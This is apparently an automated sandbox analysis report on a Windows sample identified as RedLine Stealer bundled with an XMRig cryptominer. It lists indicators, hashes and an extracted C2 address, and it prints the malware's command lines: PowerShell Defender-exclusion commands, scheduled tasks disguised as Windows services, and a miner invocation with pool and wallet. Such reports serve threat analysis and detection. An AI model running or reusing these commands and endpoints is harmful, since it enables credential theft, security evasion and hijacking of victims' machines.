Analysis
-
max time kernel
155s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
-
submitted
28/11/2022, 02:01
General
-
Target
file.exe
-
Size
12.7MB
-
MD5
73da708b6e7cb62ed7a8dbfb82248915
-
SHA1
736532c733926259633b1f3c1fef02f623c68445
-
SHA256
ee10496e97091facfa2d36aa690c3ed3cf7eb080d1b36b99067d6871d2106d46
-
SHA512
f7e449390017aba0828d8b1e526aa19bf37902ebaae7983e3cdacb44414d8882315e3b0c873408cc1932d21125bdd59986fbeb413f1ea1d17551d9dfa13df19c
-
SSDEEP
393216:YXmmhVLcncVXz1UBS8bbLSvxgoKZGuriqRxQuYf:e+a1+vLpoKYurdfe
Malware Config
Extracted
redline
185.215.113.69:15544
-
auth_value
1372cd9fae57c6645ea8737ff631eb3c
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
XMRig Miner payload 10 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 12 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Updater.exe"C:\Windows\system32\Updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\System.exe"C:\Users\Admin\AppData\Local\Temp\System.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\ProgramData\Dllhost\dllhost.exe"C:\ProgramData\Dllhost\dllhost.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk4699" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk4699" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9599" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk9599" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2538" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
C:\Windows\SysWOW64\schtasks.exeSCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk2538" /TR "C:\ProgramData\Dllhost\dllhost.exe"7⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk1783" /TR "C:\ProgramData\Dllhost\dllhost.exe"6⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json6⤵
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\ProgramData\Dllhost\winlogson.exeC:\ProgramData\Dllhost\winlogson.exe -c config.json7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
-
-
-
-
-
C:\Windows\SysWOW64\Setup.exe"C:\Windows\system32\Setup.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 3 /tn "MicrosoftEdgeUpdate" /tr "C:\Users\Admin\AppData\Roaming\DataSellSetupMutex\RegVBS.exe.exe" /f3⤵
- Creates scheduled task(s)
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe --algo rx/0 --donate-level 0 --max-cpu-usage 60 -oxmr-eu1.nanopool.org:14444 -u 42CqPp3vCd3EurYa4S5wYdFJzNFEtgwc7VmmGzq4BQtz7rWKxVyjQQ8hFvB4P49FmCeLu8NrfN5t1S8oCbkaaVd34YvGvQN3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4948 -s 11603⤵
- Program crash
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 4948 -ip 49481⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD58eac424b39ecd7724237708242536dce
SHA1dbd058d840422fcaaf1d6897564e73be3641f7d3
SHA256a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229
SHA5121ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa
-
Filesize
60KB
MD58eac424b39ecd7724237708242536dce
SHA1dbd058d840422fcaaf1d6897564e73be3641f7d3
SHA256a43dad593d702d374a6f7d8f0a7de4a1e98a8a7edbf25cc01c45b7f26e60a229
SHA5121ed33db65161a5ee089f4f030c42ac5168be0d5fd041422575d23e2f414a477b18397f583d7d53a744df716798f79de407bcb33ab8602644371c44291fa0c7fa
-
Filesize
7.8MB
MD56f4532e49d65c2be0355b222f96e06e8
SHA1268e90ce25e01bbb205f6ae3f493f8da36a61480
SHA256acaf8e844ef7f4f65033ebe9546c394cc21bce175dac8b59199106309f04e5ab
SHA51285f495b0bbd0673df376f44e912f9a0a8d201c2843f1a9efa64d93703a2d8ba2b6fa2638a747e79604715d26ddfc07de26ba43d03adf86290d928b442bf09207
-
Filesize
315B
MD5c465700b27e8387849ca1e4ef9b115cf
SHA1139398a2136c7c40cfb48385d0a48bde89d6b94c
SHA256e2afe75858da3d4d9cebb3303bd671f90863d82e447c5a9a195b9d90a39cb067
SHA5127dd6d8ee2ed46e5d83ecc7a85ef0734e56e8564d5a2c5778ae656e5953e55ff9781c0a9df5739ab7601d3801ae6711c06248955c97d3e8d1ac29c51fe2661b93
-
Filesize
1KB
MD59d06a9235fdb2d61f92103c8d690b134
SHA1087dff70c2f5b647983abe9f668a1704a0574a45
SHA256bbd04cc6634065ee1bac547c611a86d5a9108fc97cd15d2fa4037c8977018353
SHA512501dff9f99d0454fda6fd1a2676299edec682df1888fd1270b9b90bc90978aa1447b5f863df663cec63fa9e3d0e57a1a0117b9cd41d10a07b7f8518afccbdf61
-
Filesize
2KB
MD5e38cf80ccd733d12acd8ed657fa76a0f
SHA1580e49e1b482dcf0480cefe6d5bf8f0331732296
SHA25647996c1354ee704ef75a94ae2217033da52695ca164573023cda951bdec728be
SHA512ed7056b56d6cd0fd42f9bb716c647ed21f988231aa0817f28be7fceab199a274a479af4e7b77b86ed298b6734b39c2e6714d46bd6bd408d9862a77d97013bc12
-
Filesize
18KB
MD59942b9c9b6210ae1be4c9864b17f91d3
SHA11ed3d6c28a45c5c86162d64db0a03228d5d3a854
SHA2565cced9eb0361883fa586b55c939a932f504b3867bff8ee24536a2127b0d8bd43
SHA512e1cfa6626069b0e1fc0dbc8dfb2510772afbc7a608b40ce138421e227db56038960c152ce7d69850542a207844eec1b5490031d58bf6ac4cc2b3797981547482
-
Filesize
56KB
MD5139cd19f65a027137d58a8845a894d62
SHA1bad5bc463d84d49ab5dc1dd6afa7be100a30ba47
SHA25600a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6
SHA5127a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e
-
Filesize
56KB
MD5139cd19f65a027137d58a8845a894d62
SHA1bad5bc463d84d49ab5dc1dd6afa7be100a30ba47
SHA25600a0b9e83b8d1af1650e8ddeaa5cd4729e4a8e55fcae4f006e04113e87afebe6
SHA5127a866f1609ec070cb612af2253d86b92ea5f39d9526e600a3d4e4e6440a1f000696f82d4f14d3853f38a592c9cccc600174128d8d612836d344350f4ce35551e
-
Filesize
11.1MB
MD57aa0deb8925c933c29ee5fdc02d50468
SHA18fc02b2c924dc1495f5658e3d9598bcbdeced726
SHA2569fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6
SHA512ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32
-
Filesize
11.1MB
MD57aa0deb8925c933c29ee5fdc02d50468
SHA18fc02b2c924dc1495f5658e3d9598bcbdeced726
SHA2569fc1224786b535bff3448c5a93df7ac7e724ae6dbfc09048e3d475e11fa9b6b6
SHA512ac0e38190e59e26dd365ece18ee4acd77f44ac5ca89088a11545fc3214eb79bba1fef40446fbcce6c9b683e1afa846fa257a8fcf027d63a5da98996df0f58d32
-
Filesize
2.4MB
MD537947dda264ac7fc5b1dc64fad3fa9a0
SHA1cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c
SHA2560144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057
SHA5126e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147
-
Filesize
2.4MB
MD537947dda264ac7fc5b1dc64fad3fa9a0
SHA1cb0f79ee93767a52d2ed9cae9cd1ff1f8a2c0c2c
SHA2560144ea67343805ac6c8d06e12eb882fe9d35e1ff3526372f9cb7c3bf4ad0b057
SHA5126e355444a591eec3c5b24c98958b212f8afb2cf137ffdc5d8b1b1a63ce70919fa70790cec47387ad0fe70d4a3c16edaa7146c851b3f5cd9aed6b4f348a28e147
-
Filesize
304KB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
7.8MB
-
Filesize
256KB
-
Filesize
1.0MB
-
Filesize
6.1MB
-
Filesize
1.8MB
-
Filesize
5.6MB
-
Filesize
584KB
-
Filesize
408KB
-
Filesize
240KB
-
Filesize
72KB
-
Filesize
160KB
-
Filesize
5.2MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
1.6MB
-
Filesize
16.5MB
-
Filesize
16.5MB
-
Filesize
1.6MB
-
Filesize
88KB
-
Filesize
80KB
-
Filesize
40KB
-
Filesize
600KB
-
Filesize
6.2MB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
6.5MB
-
Filesize
120KB
-
Filesize
304KB
-
Filesize
200KB
-
Filesize
120KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
40KB
-
Filesize
216KB
-
Filesize
56KB
-
Filesize
104KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
72KB
-
Filesize
11.2MB